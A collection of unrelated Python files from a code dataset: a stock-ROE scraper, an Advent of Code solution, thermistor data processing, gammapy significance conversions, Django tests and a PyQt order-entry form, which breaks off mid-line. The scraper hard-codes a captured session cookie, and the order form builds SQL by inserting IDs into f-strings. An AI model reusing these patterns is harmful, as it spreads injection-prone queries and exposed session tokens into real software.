    if code[0] == '0' or code[0] == '3':\r\n                head = 'sz'\r\n            url = \"https://eniu.com/chart/roea/{0}{1}\".format(\r\n                head, code)\r\n            \r\n            if self.counter % 50 == 0:\r\n                print(\"now code............................................................... 
{0}\".format(code))\r\n            self.counter += 1\r\n            return (url, self.kwargs)\r\n        else:\r\n            raise StopIteration\r\n\r\n\r\nclass Handler(spider2.FakeSpider):\r\n    crawl_config = {\r\n    }\r\n    \r\n    def __init__(self):\r\n        spider2.FakeSpider.__init__(self)\r\n        self.notOK = 0\r\n    \r\n    def on_start(self):\r\n        myclass = MyNumbers(headers=self.header(), callback=self.processFirstPage)\r\n        myiter = iter(myclass)\r\n        self.crawl(myiter)\r\n        #self.crawl(self.url(), headers=self.header(), callback=self.processFirstPage)\r\n    \r\n    def url(self):\r\n        url = \"https://eniu.com/chart/roea/sh{0}\".format(\"601398\")\r\n        out = []\r\n        out.append(url)\r\n        return out\r\n        # begin = 500\r\n        # begin2 = 400\r\n        # for one in range(1, 100):\r\n        #     code = begin + one\r\n        #     code2 = begin2 + one\r\n        #     url = \"https://xueqiu.com/cubes/data/rank_percent.json?cube_symbol=ZH000{0:06d}&cube_id={1}&market=cn&dimension=annual&_=1574180296578\".format(\r\n        #         code, code2)\r\n        #     print(url)\r\n        #     out.append(url)\r\n        # return out\r\n    \r\n    def header(self):\r\n        headers = {\r\n            \"Accept\": \"application/json, text/plain, */*\",\r\n            \"Accept-Encoding\": \"gzip, deflate, br\",\r\n            \"Accept-Language\": \"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n            \"Connection\": \"keep-alive\",\r\n            \"Cookie\": \"PHPSESSID=0v43ul88556id679l4b9rojp00; Hm_lvt_45d0f23af3186fc1292d2629c2cbacb6=1574876344; __gads=Test; Hm_lpvt_45d0f23af3186fc1292d2629c2cbacb6=1574908733\",\r\n            \"Host\": \"eniu.com\",\r\n            \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\r\n            \"Referer\": \"https://eniu.com/gu/sh601398/roe\",\r\n            \"X-Requested-With\": \"XMLHttpRequest\",\r\n        }\r\n        return headers\r\n    \r\n    def processFirstPage(self, response):\r\n        if response.ok == False:\r\n            self.notOK += 1\r\n            if self.notOK > 20:\r\n                print(response.url)\r\n            return\r\n        \r\n        try:\r\n            data1 = response.content[1:-1]\r\n            data2 = data1.decode(\"ascii\")\r\n            data3 = data2.replace(\"\\\\\", \"\")\r\n            jsonData = json.loads(data3) # , encoding='GB2312')\r\n            urls = response.url.split('/')\r\n            jsonData[\"_id\"] = urls[-1]\r\n            util.saveMongoDB2(jsonData, \"stock2\", \"roe\")\r\n            #util.saveMongoDB2(jsonData, \"stock2\", \"roe\")\r\n        except UnicodeDecodeError as e:\r\n            print(e)\r\n        except Exception as e:\r\n            print(e)\r\n\r\n\r\ndef ProcessRank():\r\n    # bucket ids in groups of 100k, count each percentile band within a bucket, and keep the ids of the 90%+ bands\r\n    client = MongoClient()\r\n    db = client['snowball']\r\n    collection = db['zh_one']\r\n    out = {}\r\n    index = 0\r\n    cursor = collection.find()\r\n    for one in cursor:\r\n        try:\r\n            barrel = int(one[\"_id\"][2:3])\r\n            rank = one[\"rank\"]\r\n            barrel2 = int(rank / 10)\r\n            if not barrel in out:\r\n                out[barrel] = {}\r\n            if not barrel2 in out[barrel]:\r\n                out[barrel][barrel2] = {}\r\n                out[barrel][barrel2][\"counter\"] = 0\r\n                out[barrel][barrel2][\"list\"] = []\r\n            \r\n            out[barrel][barrel2][\"counter\"] += 1\r\n            if barrel2 >= 9 or barrel2 == 0:\r\n                out[barrel][barrel2][\"list\"].append(one[\"_id\"][2:])\r\n            \r\n            index += 1\r\n            if index % 1000 == 0:\r\n                print(\"the id processing is \" + one[\"_id\"])\r\n        except Exception as e:\r\n            print(e)\r\n    \r\n    Save(out)\r\n\r\n\r\ndef Save(out):\r\n    for k, one in out.items():\r\n        for k2, two in one.items():\r\n            data = {}\r\n            data[\"_id\"] = str(k) + \":\" + str(k2)\r\n            data[\"counter\"] = two[\"counter\"]\r\n            data[\"list\"] = two[\"list\"]\r\n            util.saveMongoDB2(data, \"snowball\", \"zh_digest\")\r\n\r\n\r\ndef ProcessRank2():\r\n    # find the portfolios ranked at or above the 98th percentile\r\n    client = MongoClient()\r\n    db = client['snowball']\r\n    collection = 
db['zh_one']\r\n out = {}\r\n index = 0\r\n cursor = collection.find()\r\n for one in cursor:\r\n try:\r\n barrel = int(one[\"_id\"][2:3])\r\n rank = one[\"rank\"]\r\n if rank >= 98:\r\n out[\"_id\"] = one[\"_id\"][2:]\r\n out[\"rank\"] = rank\r\n util.saveMongoDB2(out, \"snowball\", \"zh_digest98\")\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef run():\r\n gpfh = Handler()\r\n gpfh.on_start()\r\n gpfh.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n # ProcessRank2()\r\n run()\r\n","sub_path":"new_stock/fake_spider/roe.py","file_name":"roe.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507164710","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 10:48:14 2018\n\n@author: Thomas\n\"\"\"\n\nimport time\nfrom collections import Counter\nfrom itertools import combinations\n\nt = time.process_time()\n\nwith open('in') as f:\n #box_ids = f.readlines()\n box_ids = f.read().split('\\n')\n\ntwos = 0 \nthrees = 0\np1 = 0\np2 = 0\n\nfor ID in box_ids:\n counter = Counter(ID)\n twos += int(2 in counter.values())\n threes += int(3 in counter.values())\n \np1 = twos * threes\n\nprint(\"Problem 1: {}\".format(p1))\nt = time.process_time() - t\nprint(\"Time elapsed: {0:.2f} s\".format(t))\n\nt = time.process_time()\n \nfor s1, s2 in combinations(box_ids, 2):\n count = 0\n p2 = ''\n for x in range(len(s1)):\n if s1[x] != s2[x]:\n count += 1\n else:\n p2 += s1[x]\n if count == 1:\n break\n \nprint(\"Problem 2: {}\".format(p2))\nt = time.process_time() - t\nprint(\"Time elapsed: {0:.2f} s\".format(t))","sub_path":"2018/aoc02/aoc02.py","file_name":"aoc02.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225101688","text":"from __future__ import division, print_function\n\nimport numpy as np\nimport matplotlib.pyplot as ppl\n\nfrom NIOZhst.Chain import Chain\nfrom NIOZhst import reindex\n\nppl.close('all')\n\n#\n# Configuration\n#\n\n# Base path of the cruise data (with final /)\ndata_path = '../data/'\n# path to the calibration data\ncalib_path = '../results/'\n# Name of the calibration file\ncalib_file1 = calib_path+'Calibration1.hdf'\ncalib_file2 = calib_path+'Calibration2.hdf'\n\n# Wrong thermistor numbers\nwrong = [8, 9,17,30,63,64,65,72,73,74,90]\n# Right thermistor numbers\ntrue = [110,109,108,107,106,105,72,111,104,103,102]\n# A dictionary of corrections, it can be entered as {a:b, c:d,...} where a,b,c,d are the file numbers\nth_corr = dict(zip(wrong,true))\n\n# dictionary with wrong ids\nwr_ids = {72:222}\n\n# List of thermistor files\nth_files = ['{:04d}'.format(reindex(t,th_corr))+'_000.SEN' \\\n for t in range(1,102)]\n\n# Depth axis\nZ = -549+np.arange(len(th_files))*0.5\n\n# First autoscale: get data from these dates\nStart = 143.\nEnd = 158.5\n\n# Second autoscale: get data from these dates\nStart2 = 143.\nEnd2 = 158.5\n\n# Sync dates\nsync_start = 150\nsync_end = 151\n\n# Number of subsets used for time dependent autoscaling\nchunks = 40\n\n#Output directory\nout_dir = '../results/'\nfig_dir = '../figures/'\n\n# File Name for final output\nout_file = out_dir+'output_detail_65c.chn'\n# Intermediate outputs\nout_file_t1 = out_dir+'output_detail_1as_65.chn'\n\n# Time step for plotting (negative to average)\nndt = -600\n\n#\n# Processing\n#\n\nC = Chain()\nC.append_therms(data_path, th_files, Z, wr_ids)\n\nC.import_calib(CalibChains=[calib_file1], 
CalEx=[\"zero\"])\nC.import_calib(CalibChains=[calib_file2], CalEx=[\"zero\"])\n\n#C.diagnostic(\"zero\", IdInc=(59,76,98))\n#C.diagnostic(\"weak\", IdInc=(5,))\n\n# Perform synchronization of the string\nC.check_missing_points(0)\nC.synchronize(Ex=\"zero\", Range=(sync_start,sync_end), Convention=\"yearday\")\n\n# Do autoscaling\nC.autoscale(Method='spline', pw=0.7, Smooth=0.2, Threshold=15, \\\n Range=(Start,End), Convention='yearday', Subsets=chunks)\n\n#C.time_ascale(stex=True, aveRange=1.0)\nC.time_ascale(Plot=fig_dir+'time_ascale_gamma', stex=True, aveRange=1.0)\n\nC.quick_save(out_file_t1)\n\n# # Do second autoscaling autoscaling\nC.autoscale(Method='spline', pw=0.7, Smooth=0.1, Threshold=0.5, \\\n Range=(Start2,End2), Convention='yearday', Subsets=chunks)\n\n# #C.time_ascale(stex=True, aveRange=1.0)\nC.time_ascale(Plot=fig_dir+'time_ascale_gamma2', stex=True, aveRange=1.0)\n \nC.quick_save(out_file)\n\n#Plot data\nif 0:\n print ('Plot data')\n time, Temper = C.to_array(Range=(Start,End), Convention='yearday', \\\n Fill='missing', Skip=ndt, Ex=[\"zero\"])\n\n F = ppl.figure()\n F.subplots_adjust(right=0.99, top=0.99)\n AX = F.add_subplot(111)\n #Tmin = Temper.min(); Tmax=Temper.max()\n Tmin = 11; Tmax = 15\n levs = Tmin + (Tmax-Tmin)*np.linspace(0, 1, 80)\n dt = np.mean(np.diff(time)); dz = np.mean(np.diff(Z))\n lims = (time[0]-0.5*dt,time[-1]+0.5*dt,Z[0]-0.5*dz,Z[-1]+0.5*dz)\n c = AX.imshow(Temper, aspect='auto', vmin=Tmin, vmax=Tmax,\\\n extent=lims)\n AX.set_xlabel('Time $\\\\mathrm{[yearday]}$')\n AX.set_ylabel('Depth $\\\\mathrm{[m]}$')\n #AX.invert_yaxis()\n clb = F.colorbar(c, format='%.2f')\n clb.set_label('Temp. ($^\\circ C$)')\n F.show()\n F.savefig(fig_dir+'temperature_day_{}_{}.png'.format(Start,End))\n","sub_path":"Meteor18days/ProcessData/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136543990","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Conversion functions for test statistic <-> significance <-> probability.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\n\n# TODO: make all the other methods private?\n# need to transfer the info from their docstrings to `convert_likelihood` first!\n# TODO: check with MC study if there's a factor 2 error in the p-values\n# because half of the TS values are exactly zero when fitting e.g. 
source extension.\n# Do we need to introduce a bool \"one_sided\" or \"hard_limit\"?\n\n\n__all__ = ['convert_likelihood',\n 'significance_to_probability_normal',\n 'probability_to_significance_normal',\n 'probability_to_significance_normal_limit',\n 'significance_to_probability_normal_limit',\n ]\n\n\ndef convert_likelihood(to, probability=None, significance=None,\n ts=None, chi2=None, df=None):\n \"\"\"Convert between various equivalent likelihood measures.\n\n TODO: don't use ``chi2`` with this function at the moment ...\n I forgot that one also needs the number of data points to\n compute ``ts``:\n http://en.wikipedia.org/wiki/Pearson%27s_chi-squared_test#Calculating_the_test-statistic\n Probably it's best to split this out into a separate function\n or just document how users should compute ``ts`` before calling this\n function if they have ``chi2``.\n\n\n This function uses the ``sf`` and ``isf`` methods of the\n `~scipy.stats.norm` and `~scipy.stats.chi2` distributions\n to convert between various equivalent ways to quote a likelihood.\n\n - ``sf`` means \"survival function\", which is the \"tail probability\"\n of the distribution and is defined as ``1 - cdf``, where ``cdf``\n is the \"cumulative distribution function\".\n - ``isf`` is the inverse survival function.\n\n The relation between the quantities can be summarised as:\n\n - significance <-- normal distribution ---> probability\n - probability <--- chi2 distribution with df ---> ts\n - ts = chi2 / df\n\n So supporting both ``ts`` and ``chi2`` in this function is redundant,\n it's kept as a convenience for users that have a ``ts`` value from\n a Poisson likelihood fit and users that have a ``chi2`` value from\n a chi-square fit.\n\n Parameters\n ----------\n to : {'probability', 'ts', 'significance', 'chi2'}\n Which quantity you want to compute.\n probability, significance, ts, chi2 : array_like\n Input quantity value ... mutually exclusive, pass exactly one!\n df : array_like\n Difference in number of degrees of freedom between\n the alternative and the null hypothesis model.\n\n Returns\n -------\n value : `numpy.ndarray`\n Output value as requested by the input ``to`` parameter.\n\n Notes\n -----\n\n **TS computation**\n\n Under certain assumptions Wilk's theorem say that the likelihood ratio\n ``TS = 2 (L_alt - L_null)`` has a chi-square distribution with ``ndf``\n degrees of freedom in the null hypothesis case, where\n ``L_alt`` and ``L_null`` are the log-likelihoods in the null and alternative\n hypothesis and ``ndf`` is the difference in the number of freedom in those models.\n\n Note that the `~gammapy.stats.cash` statistic already contains the factor 2,\n i.e. you should compute ``TS`` as ``TS = cash_alt - cash_null``.\n\n - http://en.wikipedia.org/wiki/Chi-squared_distribution\n - http://docs.scipy.org/doc/scipy-dev/reference/generated/scipy.stats.chi2.html\n - http://en.wikipedia.org/wiki/Likelihood-ratio_test#Wilks.27s_theorem\n - http://adsabs.harvard.edu/abs/1979ApJ...228..939C\n - http://adsabs.harvard.edu/abs/2009A%26A...495..989S\n\n **Physical limits**\n\n ``probability`` is the one-sided `p-value`, e.g. `significance=3`\n corresponds to `probability=0.00135`.\n\n TODO: check if this gives correct coverage for cases with hard physical limits,\n e.g. when fitting TS of extended sources vs. point source and in half of the\n cases ``TS=0`` ... 
I suspect coverage might not be OK and we need to add an\n option to this function to handle those cases!\n\n Examples\n --------\n Here's some examples how to compute the ``probability`` or ``significance``\n for a given observed ``ts`` or ``chi2``:\n\n >>> from gammapy.stats import convert_likelihood\n >>> convert_likelihood(to='probability', ts=10, df=2)\n 0.0067379469990854679\n >>> convert_likelihood(to='significance', chi2=19, df=7)\n 2.4004554920435521\n\n Here's how to do the reverse, compute the ``ts`` or ``chi2`` that would\n result in a given ``probability`` or ``significance``.\n\n >>> convert_likelihood(to='ts', probability=0.01, df=1)\n 6.6348966010212171\n >>> convert_likelihood(to='chi2', significance=3, df=10)\n 28.78498865156606\n \"\"\"\n from scipy.stats import norm as norm_distribution\n from scipy.stats import chi2 as chi2_distribution\n\n # ---> Check inputs are OK!\n # ---> This is a function that will be used interactively by end-users,\n # ---> so we want good error messages if they use it correctly.\n\n # Check that the output `to` parameter is valid\n valid_quantities = ['probability', 'ts', 'significance', 'chi2']\n if to not in valid_quantities:\n msg = 'Invalid parameter `to`: {}\\n'.format(to)\n msg += 'Valid options are: {}'.format(valid_quantities)\n raise ValueError(msg)\n\n # Check that the input is valid\n _locals = locals().copy()\n input_values = [_ for _ in valid_quantities\n if _locals[_] is not None]\n if len(input_values) != 1:\n msg = 'You have to pass exactly one of the valid input quantities: '\n msg += ', '.join(valid_quantities)\n msg += '\\nYou passed: '\n if len(input_values) == 0:\n msg += 'none'\n else:\n msg += ', '.join(input_values)\n raise ValueError(msg)\n\n input_type = input_values[0]\n input_value = locals()[input_type]\n\n # Check that `df` is given if it's required for the computation\n if any(_ in ['ts', 'chi2'] for _ in [input_type, to]) and df is None:\n msg = 'You have to specify the number of degrees of freedom '\n msg += 'via the `df` parameter.'\n raise ValueError(msg)\n\n\n # ---> Compute the requested quantity\n # ---> By now we know the inputs are OK.\n\n # Compute equivalent `ts` for `chi2` ... after this\n # the code will only handle the `ts` input case,\n # i.e. 
conversions: significance <-> probability <-> ts\n if chi2 is not None:\n ts = chi2 / df\n\n # A note that might help you understand the nested if-else-statement:\n # The quantities `probability`, `significance`, `ts` and `chi2`\n # form a graph with `probability` at the center.\n # There might be functions directly relating the other quantities\n # in general or in certain limits, but the computation here\n # always proceeds via `probability` as a one- or two-step process.\n\n if to == 'significance':\n if ts is not None:\n probability = chi2_distribution.sf(ts, df)\n return norm_distribution.isf(probability)\n\n elif to == 'probability':\n if significance is not None:\n return norm_distribution.sf(significance)\n else:\n return chi2_distribution.sf(ts, df)\n\n elif to == 'ts':\n # Compute a probability if needed\n if significance is not None:\n probability = norm_distribution.sf(significance)\n\n return chi2_distribution.isf(probability, df)\n\n elif to == 'chi2':\n if ts is not None:\n return df * ts\n # Compute a probability if needed\n if significance is not None:\n probability = norm_distribution.sf(significance)\n\n return chi2_distribution.isf(probability, df)\n\n\ndef significance_to_probability_normal(significance):\n \"\"\"Convert significance to one-sided tail probability.\n\n Parameters\n ----------\n significance : array_like\n Significance\n\n Returns\n -------\n probability : ndarray\n One-sided tail probability\n\n See Also\n --------\n probability_to_significance_normal,\n significance_to_probability_normal_limit\n\n Examples\n --------\n >>> significance_to_probability_normal(0)\n 0.5\n >>> significance_to_probability_normal(1)\n 0.15865525393145707\n >>> significance_to_probability_normal(3)\n 0.0013498980316300933\n >>> significance_to_probability_normal(5)\n 2.8665157187919328e-07\n >>> significance_to_probability_normal(10)\n 7.6198530241604696e-24\n \"\"\"\n from scipy.stats import norm\n return norm.sf(significance)\n\n\ndef probability_to_significance_normal(probability):\n \"\"\"Convert one-sided tail probability to significance.\n\n Parameters\n ----------\n probability : array_like\n One-sided tail probability\n\n Returns\n -------\n significance : ndarray\n Significance\n\n See Also\n --------\n significance_to_probability_normal,\n probability_to_significance_normal_limit\n\n Examples\n --------\n >>> probability_to_significance_normal(1e-10)\n 6.3613409024040557\n \"\"\"\n from scipy.stats import norm\n return norm.isf(probability)\n\n\ndef _p_to_s_direct(probability, one_sided=True):\n \"\"\"Direct implementation of p_to_s for checking.\n\n Reference: RooStats User Guide Equations (6,7).\n \"\"\"\n from scipy.special import erfinv\n probability = 1 - probability # We want p to be the tail probability\n temp = np.where(one_sided, 2 * probability - 1, probability)\n return np.sqrt(2) * erfinv(temp)\n\n\ndef _s_to_p_direct(significance, one_sided=True):\n \"\"\"Direct implementation of s_to_p for checking.\n\n Note: _p_to_s_direct was solved for p.\n \"\"\"\n from scipy.special import erf\n temp = erf(significance / np.sqrt(2))\n probability = np.where(one_sided, (temp + 1) / 2., temp)\n return 1 - probability # We want p to be the tail probability\n\n\ndef probability_to_significance_normal_limit(probability):\n \"\"\"Convert tail probability to significance\n in the limit of small p and large s.\n\n Reference: Equation (4) of\n http://adsabs.harvard.edu/abs/2007physics...2156C\n They say it is better than 1% for s > 1.6.\n\n Asymptotically: s ~ 
sqrt(-log(p))\n \"\"\"\n u = -2 * np.log(probability * np.sqrt(2 * np.pi))\n return np.sqrt(u - np.log(u))\n\n\ndef significance_to_probability_normal_limit(significance, guess=1e-100):\n \"\"\"Convert significance to tail probability\n in the limit of small p and large s.\n\n See p_to_s_limit docstring\n Note: s^2 = u - log(u) can't be solved analytically.\n \"\"\"\n from scipy.optimize import fsolve\n\n def f(probability):\n if probability > 0:\n return probability_to_significance_normal_limit(probability) - significance\n else:\n return 1e100\n\n return fsolve(f, guess)\n","sub_path":"gammapy/stats/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1141367","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl='https://www.programcreek.com/python/index/221/requests'\nres=requests.get(url).text\nsoup=BeautifulSoup(res,'lxml')\nlist=[]\nfor aa in soup.find_all(attrs={'id':'api-list-apiname'}):\n list.append(aa.a['href'])\n\n\ndef one(url):\n res=requests.get(url).text\n soup=BeautifulSoup(res,'lxml')\n for a2 in soup.find_all(attrs={'class':'examplebox'}):\n print(a2.find(attrs={'class':'exampleboxbody'}).pre.text)\n with open('r04de.txt','a',encoding='utf-8') as f:\n f.write('\\n'+a2.find(attrs={'class':'exampleboxbody'}).pre.text+'\\n')\n\n\nfor k in list:\n one(k)\n\n","sub_path":"homework7/r04.py","file_name":"r04.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"630270727","text":"from django.test import TestCase\nfrom django.urls import resolve\nfrom django.http import HttpRequest\nfrom django.contrib.staticfiles import finders\n\nfrom webpage.views import home_page, gallery_page\n\n\nclass HomePageTest(TestCase):\n\n def test_root_url_resolves_to_home_page_view(self):\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n def test_home_page_returns_correct_html(self):\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n\n def test_image_uploaded(self):\n request = HttpRequest()\n response = home_page(request)\n html = response.content.decode('utf8')\n\n self.assertIn(' 0 and c <= 9 and (\n curid == tab.getOnlyData((r - 1, 0))):\n return ''\n elif c == 2 and role == Qt.DecorationRole and submited and curid != tab.getOnlyData((r - 1, 0)):\n return self.ok_icon\n elif c == 2 and role == Qt.DisplayRole and submited:\n return \"Submited\"\n else:\n return super().data(index, role=role)\n\n\nclass JPFuncForm_OutboundOrder(JPFunctionForm):\n def __init__(self, MainForm):\n super().__init__(MainForm)\n self.MainForm = MainForm\n sql_0 = \"\"\"\n SELECT o.fOrderID as 出库单号OrderID,\n fOrderDate as 日期OrderDate,\n fSubmited as 提交,\n fCustomerName as 客户名Cliente,\n fRequiredDeliveryDate as 交货日期RequiredDeliveryDate,\n o.fAmount as 总金额SubTotal,\n fDesconto as 折扣Desconto,\n fTax as 税金IVA,\n fPayable as `应付金额Valor a Pagar`,\n o.fContato as 联系人Contato,\n Null as ``,\n p.fProductName AS '名称Descrição',\n t.fQuant AS '数量Qtd',\n t.fPrice AS '单价P. 
Unitario', \n t.fAmount AS '金额Total'\n from v_product_outbound_order as o \n right join t_product_outbound_order_detail as t on o.fOrderID=t.fOrderID \n\t\t\t\t\tleft Join t_product_information as p on t.fProductID=p.fID\n \"\"\"\n sql_1 = sql_0 + \"\"\"\n WHERE fOrderDate{date}\n AND (fSubmited={ch1} OR fSubmited={ch2})\n AND fOrderDate{date}\n ORDER BY o.fOrderID DESC\"\"\"\n sql_2 = sql_0 + \"\"\" ORDER BY o.fOrderID DESC\"\"\"\n self.backgroundWhenValueIsTrueFieldName = ['fSubmited']\n self.checkBox_1.setText('Submited')\n self.checkBox_2.setText('UnSubmited')\n self.checkBox_1.setChecked(False)\n self.checkBox_2.setChecked(True)\n super().setListFormSQL(sql_1, sql_2)\n #self.tableView.setColumnHidden(13, True)\n self.fSubmited_column = 2\n self.pub = JPPub()\n self.pub.UserSaveData.connect(self.UserSaveData)\n\n m_sql = \"\"\"\n SELECT fOrderID as 订单号码OrderID\n , fOrderDate as 日期OrderDate\n , fVendedorID as 销售人员Vendedor\n , fRequiredDeliveryDate as 交货日期RequiredDeliveryDate\n , fCustomerID as 客户名Cliente\n , fContato\n , fCelular\n , fTelefone\n , fAmount\n , fTax\n , fPayable\n , fDesconto\n , fNote\n ,fEntryID\n FROM t_product_outbound_order\n WHERE fOrderID = '{}'\n \"\"\"\n s_sql = \"\"\"\n SELECT fID, fOrderID, \n fProductID AS '名称Descrição', fQuant AS '数量Qtd',\n fPrice AS '单价P. Unitario', fAmount AS '金额Total'\n FROM t_product_outbound_order_detail\n WHERE fOrderID = '{}'\n \"\"\"\n self.setEditFormSQL(m_sql, s_sql)\n\n def UserSaveData(self, tbName):\n if tbName == 't_product_outbound_order':\n self.refreshListForm()\n\n def onGetModelClass(self):\n return OutboundOrderMod\n\n def getEditForm(self, sql_main, edit_mode, sql_sub, PKValue):\n\n frm = EditForm_OutboundOrder(sql_main=sql_main,\n edit_mode=edit_mode,\n sql_sub=sql_sub,\n PKValue=PKValue)\n frm.ui.fOrderID.setEnabled(False)\n frm.ui.fCity.setEnabled(False)\n frm.ui.fNUIT.setEnabled(False)\n frm.ui.fEntryID.setEnabled(False)\n frm.ui.fEndereco.setEnabled(False)\n frm.ui.fEmail.setEnabled(False)\n return frm\n\n @pyqtSlot()\n def on_CmdSubmit_clicked(self):\n cu_id = self.getCurrentSelectPKValue()\n if not cu_id:\n return\n db = JPDb()\n info = self.model.TabelFieldInfo\n submitted = info.getOnlyData([\n self.tableView.selectionModel().currentIndex().row(),\n self.fSubmited_column\n ])\n if submitted == 1:\n msg = '记录【{cu_id}】已经提交,不能重复提交!\\nThe order [{cu_id}] '\n msg = msg + 'has been submitted, can not be repeated submission!'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n return\n msg = '提交后出库单将不能修改!确定继续提交记录【{cu_id}】吗?\\n'\n msg = msg + 'The order \"{cu_id}\" will not be modified after submission. 
'\n msg = msg + 'Click OK to continue submitting?'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n reply = QMessageBox.question(self, '确认', msg,\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n sql0 = f\"\"\"UPDATE t_product_outbound_order set fSubmited=1 \n where fOrderID='{cu_id}';\"\"\"\n sql1 = f\"\"\"\n UPDATE t_product_information AS p,\n (SELECT fProductID,\n sum(fQuant) AS sum_sl\n FROM t_product_outbound_order_detail\n WHERE fOrderID='{cu_id}'\n GROUP BY fProductID) AS q1 SET p.fCurrentQuantity=p.fCurrentQuantity-q1.sum_sl\n WHERE p.fID=q1.fProductID;\n \"\"\"\n sql2 = \"select '{cu_id}';\"\n db.executeTransaction([sql0, sql1,sql2])\n JPPub().broadcastMessage(tablename=\"t_product_outbound_order\",\n PK=cu_id,\n action='Submit')\n self.refreshListForm()\n\n @pyqtSlot()\n def on_CmdExportToExcel_clicked(self):\n exp = JPExpExcelFromTabelFieldInfo(self.model.TabelFieldInfo,\n self.MainForm)\n exp.run()\n\n @pyqtSlot()\n def on_CmdEdit_clicked(self):\n cu_id = self.getCurrentSelectPKValue()\n if not cu_id:\n return\n info = self.model.TabelFieldInfo\n submitted = info.getOnlyData([\n self.tableView.selectionModel().currentIndex().row(),\n self.fSubmited_column\n ])\n if submitted == 1:\n msg = '记录【{cu_id}】已经提交,不能修改!\\nThe order [{cu_id}] '\n msg = msg + 'has been submitted, can not edit it!'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n return\n frm = self.getEditForm(sql_main=self.SQL_EditForm_Main,\n sql_sub=self.SQL_EditForm_Sub,\n edit_mode=JPEditFormDataMode.Edit,\n PKValue=cu_id)\n frm.setListForm(self)\n frm.afterSaveData.connect(self.refreshListForm)\n self.__EditForm = None\n self.__EditForm = frm\n self.afterCreateEditForm.emit(JPEditFormDataMode.Edit)\n frm.exec_()\n\n\nclass mySubMod(JPTableViewModelReadOnly):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def data(self, index, role=Qt.DisplayRole):\n r = index.row()\n c = index.column()\n tab = self.TabelFieldInfo\n curid = tab.getOnlyData((r, 2)) # DataRows[r].Datas[0]\n\n if role == Qt.DisplayRole and c == 2:\n if curid:\n return self.getFullProductName(curid)\n elif role == Qt.TextAlignmentRole and c == 2:\n return (Qt.AlignLeft | Qt.AlignVCenter)\n\n else:\n return super().data(index, role=role)\n\n\nclass EditForm_OutboundOrder(JPFormModelMainHasSub):\n def __init__(self,\n sql_main=None,\n PKValue=None,\n sql_sub=None,\n edit_mode=JPEditFormDataMode.ReadOnly,\n flags=Qt.WindowFlags()):\n super().__init__(Ui_Form(),\n sql_main=sql_main,\n PKValue=PKValue,\n sql_sub=sql_sub,\n edit_mode=edit_mode,\n flags=flags)\n\n JPPub().MainForm.addLogoToLabel(self.ui.label_logo)\n self.setPkRole(8)\n self.cacuTax = True\n self.ui.fTax.keyPressEvent = self.__onTaxKeyPress\n self.readData()\n if self.isNewMode:\n self.ObjectDict()['fEntryID'].refreshValueNotRaiseEvent(\n JPUser().currentUserID())\n else:\n self.__customerIDChanged()\n if edit_mode != JPEditFormDataMode.ReadOnly:\n self.ui.fCustomerID.setEditable(True)\n self.ui.fOrderDate.refreshValueNotRaiseEvent(QDate.currentDate())\n self.ui.fRequiredDeliveryDate.FieldInfo.NotNull = True\n self.ui.fCustomerID.setFocus()\n self.ui.tableView.keyPressEvent = self.mykeyPressEvent\n self.ui.tableView.doubleClicked.connect(self.table_change)\n self.productInfo = self.__getProductInfo()\n self.subModel.getFullProductName = self.getFullProductName\n self._setEditFormButtonsIcon(self.ui)\n\n def _setEditFormButtonsIcon(self, ui):\n pub = 
JPPub()\n fun = pub.MainForm.addOneButtonIcon\n fun(ui.butSave, \"save.png\")\n fun(ui.butPrint, \"print.png\")\n fun(ui.butPDF, \"pdf.png\")\n\n def __getProductInfo(self):\n sql = \"\"\"\n select fID,fProductName, fCurrentQuantity ,\n fSpesc,fWidth,fLength,fUint\n from t_product_information where fCancel=0\n \"\"\"\n lst = JPDb().getDataList(sql)\n return {r[0]: r[1:] for r in lst}\n\n def getFullProductName(self, curid):\n if curid:\n r = self.productInfo[curid]\n r1 = [r[0]]\n for i in range(len(r)):\n if i >= 2 and r[i]:\n r1.append(r[i])\n return \" /\".join(r1)\n\n def onGetModelClass(self):\n return mySubMod\n\n def table_change(self, index1):\n def fun(p_id, product_name, fCurrentQuantity):\n tab = self.subModel.TabelFieldInfo\n tab.setData([r, 2], p_id)\n\n r = index1.row()\n if index1.column() == 2 and not self.isReadOnlyMode:\n frm = ProductSelecter()\n frm.ProductSeledted.connect(fun)\n frm.exec_()\n\n # 手动增加空行\n def mykeyPressEvent(self, KeyEvent):\n if (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_D):\n mod = self.subModel\n l = len(self.subTableFieldsInfo)\n mod.insertRows(l, 1, mod.createIndex(0, l))\n\n def __customerIDChanged(self):\n c_id = self.ui.fCustomerID.Value()\n if 